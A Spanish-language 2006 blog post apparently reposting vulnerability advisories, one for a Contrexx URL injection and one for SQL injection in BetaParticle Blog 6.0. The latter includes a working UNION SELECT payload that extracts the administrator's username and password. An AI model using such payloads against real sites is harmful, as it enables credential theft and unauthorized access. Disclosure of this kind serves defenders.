ecoestadistica.com

sábado, marzo 18, 2006

Vulnerabilidades....

Sitio :
http://www.contrexx.com

Bug :
http://victim/path/index.php/">

Vulnerable :
All Version ( => v1.0.8 )

Credit :
Soot
Shabgard Security Team
---------------------------------------------------------------------------------------

BetaParticle Blog <= 6.0 Multiple Remote SQL Injection
Vulnerabilities

Vendedor: BetaParticle (http://www.betaparticle.com/)
Version: 6.0

Ejemplo:

GET -> http://[sitio]/bpdir/template_permalink.asp?id=[SQLQuery]
GET -> http://[sitio]/bpdir/template_gallery_detail.asp?fldGalleryID=[SQLQuery]

Ejemplo:

http://[sitio]/bpdir/template_gallery_detail.asp?fldGalleryID=-1+UNION+SELECT+null,fldAuthorUsername
,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1

Con este ejemplo un atacante remoto podría obtener el pass de la administración y realizar la entrada de /main.asp

Salu2

0 Comments:

Publicar un comentario

Links to this post:

Crear un vínculo

<< Home

ecoestadistica.com